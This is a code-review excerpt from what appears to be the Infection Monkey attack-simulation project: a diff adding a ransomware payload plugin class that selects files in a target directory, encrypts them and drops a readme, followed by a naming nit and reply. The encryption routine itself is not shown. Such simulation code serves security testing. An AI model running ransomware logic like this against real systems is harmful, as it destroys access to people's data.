monkey/agent_plugins/payloads/ransomware/src/ransomware.py

```diff
@@ -0,0 +1,110 @@
+import logging
+import threading
+from pathlib import Path
+from typing import Iterable
+
+from common.agent_events import FileEncryptionEvent
+from common.event_queue import IAgentEventQueue
+from common.tags import DATA_ENCRYPTED_FOR_IMPACT_T1486_TAG
+from common.types import AgentID
+from infection_monkey.utils.threading import interruptible_function, interruptible_iter
+
+from .consts import README_FILE_NAME, README_SRC
+from .internal_ransomware_options import InternalRansomwareOptions
+from .typedef import FileEncryptorCallable, FileSelectorCallable, ReadmeDropperCallable
+
+logger = logging.getLogger(__name__)
+
+RANSOMWARE_PAYLOAD_TAG = "ransomware-payload"
+RANSOMWARE_TAGS = frozenset({RANSOMWARE_PAYLOAD_TAG, DATA_ENCRYPTED_FOR_IMPACT_T1486_TAG})
+
+
+class Ransomware:
+    def __init__(
+        self,
+        config: InternalRansomwareOptions,
+        encrypt_file: FileEncryptorCallable,
+        select_files: FileSelectorCallable,
+        leave_readme: ReadmeDropperCallable,
+        agent_event_queue: IAgentEventQueue,
+        agent_id: AgentID,
+    ):
+        self._config = config
+
+        self._encrypt_file = encrypt_file
+        self._select_files = select_files
+        self._leave_readme = leave_readme
+        self._agent_event_queue = agent_event_queue
+        self._agent_id = agent_id
+
+        self._target_directory = self._config.target_directory
+        self._readme_file_path = (
+            self._target_directory / README_FILE_NAME  # type: ignore
+            if self._target_directory
+            else None
+        )
+
+    def run(self, interrupt: threading.Event):
+        if not self._target_directory:
+            return
+
+        logger.info("Running ransomware payload")
+
+        if not self._target_directory.exists():
+            logger.warning(f"Target directory {self._target_directory} does not exist")
+            return
+
+        if not self._target_directory.is_dir():
+            logger.warning(f"Target directory {self._target_directory} is not a directory")
+            return
+
+        if self._target_directory.is_symlink():
+            logger.warning(
+                "The ransomware payload will not follow symlinks - skipping "
+                f"{self._target_directory}"
+            )
+            return
+
+        # If a target directory was supplied and exists, then we can encrypt some files in it.
+        files_to_encrypt = self._find_files()
+        self._encrypt_files(files_to_encrypt, interrupt)
+
+        if self._config.leave_readme:
+            self._leave_readme_in_target_directory(interrupt=interrupt)
+
+    def _find_files(self) -> Iterable[Path]:
+        logger.info(f"Collecting files in {self._target_directory}")
+        return self._select_files(self._target_directory)  # type: ignore
+
+    def _encrypt_files(self, files_to_encrypt: Iterable[Path], interrupt: threading.Event):
```

Comment:
NIT: we have `self._encrypt_file` and `self._encrypt_files`. Maybe we should rename one or another to avoid confusion

Reply:
Renamed `_encrypt_files()` -> `_encrypt_selected_files()`